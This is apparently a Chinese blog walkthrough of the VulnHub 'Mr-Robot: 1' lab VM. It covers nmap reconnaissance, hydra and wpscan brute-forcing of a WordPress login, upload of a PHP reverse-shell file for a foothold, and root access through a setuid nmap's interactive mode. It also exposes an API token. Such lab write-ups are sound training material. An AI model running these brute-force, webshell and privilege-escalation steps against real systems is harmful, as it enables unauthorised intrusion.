VulnHub-Mr-Robot: 1 靶场渗透测试

时间:2021.3.14

靶场信息:
地址:https://www.vulnhub.com/entry/mr-robot-1,151/
发布日期:2016年6月28日
目标:得到root权限&找到3个key

一、信息收集

1、获取靶机IP地址

nmap -sP 192.168.137.0/24

image-20210312085133199

由探测结果可知,靶机的IP为192.168.137.128

2、扫描开放的端口和服务

nmap -sS -sV -T5 -p- 192.168.137.128

image-20210312085334361

得到开放的端口信息:

22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd

3、网站信息收集

访问80端口,看看是怎样一个web应用

image-20210314123226886

查看robots.txt

image-20210314123031863

访问key-1-of-3.txt,得到第一个key

image-20210314123053554

fsocity.dic应该问是一个字典文件,将它下载到本地

wget http://192.168.137.128/fsocity.dic 

二、漏洞探测

然后使用nikto对网站扫描

image-20210314124021030

发现有一个用WordPress搭建的网站,以及wp-admin,访问wp-admin,试了一下admin,提示无效的用户名,随便再试了试其他的,发现返回一样的结果,我们可以利用之前fsocity.dic文件想着能不能先把用户名给爆破出来

image-20210314124214721

然后我们使用BurpSuite抓包爆破

image-20210314125455743

得到用户名为Elliot是有效的,也可以使用hydra爆破

hydra -L fsocity.txt  -p test  192.168.16.146 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"

然后使用wpsan爆破出用户Elliot的密码

wpscan --url http://192.168.137.128/wp-login.php -U elliot -P fsocity.dic --api-token 'ieXJyOeJG2wvpNZVF5LWOngznZFGTKpksey9q5Z4Sks'
Username: elliot
Password: ER28-0652

登录进来之后,我们找到了一处可以上文件的地方

image-20210314131244809

这里上传一个kali自带的反弹shell的文件:/usr/share/webshells/php/php-reverse-shell.php

image-20210314131421283

三、漏洞利用

我们在Media模块发现我们上传的shell.php,点开得到路径

image-20210314131635118

然后访问http://192.168.137.128/wp-content/uploads/2021/03/shell.php

image-20210314132421675

image-20210314133700664

四、提权

将robot的密码进行md5解密,得到abcdefghijklmnopqrstuvwxyz

image-20210314133641964

得到密码之后,我们切换至robot用户,查看key2

image-20210314133840002

搜索setuid二进制文件

find / -perm -4000 2>/dev/null

image-20210314134045322

发现nmap具备SID权限,看一下nmap版本发现是3.81,较旧版本的Nmap(2.02至5.21)具有交互模式,允许用户执行shell命令

nmap --interactive

输入!sh启动shell,进入/root目录查看key3

image-20210314134531671

总结

第一次了解到了nmap2.02-5.21版本具备交互模式,可以通过--interactive来获得。

posted @ 2021-03-14 13:51  l2sec  阅读(203)  评论(0编辑  收藏  举报